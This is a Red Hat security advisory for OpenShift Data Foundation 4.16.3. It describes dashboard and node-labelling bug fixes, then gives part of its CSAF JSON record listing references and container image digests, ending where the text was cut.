Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an
S3 compatible API.
Bug fixes:
* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)
* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label "cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'", where "CLUSTER_NAMESPACE" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, "cluster.ocs.openshift.io/openshift-storage: ‘’.
With this fix, the user interface adds a static label "cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)
Enhancement:
* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)
All users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an\nS3 compatible API.\n\nBug fixes:\n\n* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)\n\n* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label \"cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'\", where \"CLUSTER_NAMESPACE\" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, \"cluster.ocs.openshift.io/openshift-storage: ‘’.\nWith this fix, the user interface adds a static label \"cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)\n\nEnhancement:\n\n* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)\n\nAll users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8113", url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2283959", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283959", }, { category: "external", summary: "2295324", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295324", }, { category: "external", summary: "2296521", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2296521", }, { category: "external", summary: "2300333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300333", }, { category: "external", summary: "2302463", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302463", }, { category: "external", summary: "2303083", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303083", }, { category: "external", summary: "2304905", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304905", }, { category: "external", summary: "2308445", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308445", }, { category: "external", summary: "2310370", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310370", }, { category: "external", summary: "2312055", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312055", }, { category: "external", summary: "2315708", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315708", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8113.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update", tracking: { current_release_date: "2025-04-10T00:22:08+00:00", generator: { date: "2025-04-10T00:22:08+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8113", initial_release_date: "2024-10-15T08:52:38+00:00", revision_history: [ { date: "2024-10-15T08:52:38+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-15T08:52:38+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:22:08+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHODF 4.16 for RHEL 9", product: { name: "RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_data_foundation:4.16::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Data Foundation", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product: { name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product_id: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product: { name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product_id: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product: { name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product_id: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product: { name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product_id: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product: { name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product_id: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product: { name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product_id: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product: { name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product_id: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product: { name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product_id: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product: { name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product_id: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product: { name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product_id: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product: { name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product_id: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698?arch=s390x&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product_id: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product_id: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product: { name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product_id: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4?arch=s390x&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product: { name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product_id: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5?arch=s390x&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product: { name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product_id: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d?arch=s390x&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product_id: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product: { name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product_id: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9?arch=s390x&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product: { name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product_id: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0?arch=s390x&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product: { name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product_id: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product: { name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product_id: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356?arch=s390x&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product: { name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product_id: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product_id: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product: { name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product_id: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product: { name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product_id: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product: { name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product_id: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product: { name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product_id: 